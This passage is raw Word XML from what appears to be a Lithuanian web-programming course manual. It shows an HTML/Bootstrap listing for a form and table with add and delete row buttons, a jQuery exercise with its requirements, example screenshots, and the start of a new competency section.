      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        &lt;div class="row mt-5"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">            &lt;div class="col-10 offset-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                &lt;form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                    &lt;div class="form-group"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;input type="text" id="name" placeholder="Name"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;input type="text" id="email" placeholder="Email Address"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;input type="button" class="add-row btn btn-info" value="Add Row"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                &lt;table class="table table-striped"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                    &lt;thead class="bg-info"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                            &lt;th&gt;Select&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                            &lt;th&gt;Name&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                            &lt;th&gt;Email&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                    &lt;/thead&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                    &lt;tbody&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                            &lt;td&gt;&lt;input type="checkbox" name="record"&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                            &lt;td&gt;Name &lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                            &lt;td&gt;name.surname@mail.com&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                    &lt;/tbody&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                &lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                &lt;button type="button" class="delete-row btn btn-danger"&gt;Delete Row&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        &lt;/div&g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 xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pP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 xml:space="preserve">    &lt;script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2"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0262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.6/umd/popper.min.js" integrity="sha384-wHAiFfRlMFy6i5SRaxvfOCifBUQy1xHdJ/yoi7FRNXMRBu5WHdZYu1hA6ZOblgut"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2"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0262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;script src="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/js/bootstrap.min.js" integrity="sha384-B0UglyR+jN6CkvvICOB2joaf5I4l3gm9GU6Hc1og6Ls7i6U/mkkaduKaBhlAXv9k"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2"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0262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reikalavimai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A47A1A" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>HTML dokumente užrašyti nuorodas į skripto failus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A47A1A" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>Naudojant selektorius, įvykius, metodus darbui su CSS klasėmis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pavyzdys:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="575A5188" wp14:editId="3EF6A1F4">
            <wp:extent cx="5937250" cy="1788795"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="184"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1788795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16AFD56D" wp14:editId="729B6A85">
            <wp:extent cx="5949950" cy="2597150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="185"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9950" cy="2597150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F526BCC" wp14:editId="27FE5823">
            <wp:extent cx="5949950" cy="1457960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="186"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9950" cy="1457960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932685" w:rsidRPr="00932685" w:rsidRDefault="00932685" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc13833405"/>
      <w:bookmarkStart w:id="30" w:name="_Toc14392420"/>
    </w:p>
    <w:p w:rsidR="00932685" w:rsidRPr="00932685" w:rsidRDefault="00932685" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kompetencija. Kurti tipinę programinę įrangą.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc735843232"/>
      <w:bookmarkStart w:id="32" w:name="_Toc1106725664"/>
      <w:bookmarkStart w:id="33" w:name="_Toc10443963"/>
      <w:bookmarkStart w:id="34" w:name="_Toc13095512"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="35" w:name="_Toc13833406"/>
      <w:bookmarkStart w:id="36" w:name="_Toc14392421"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
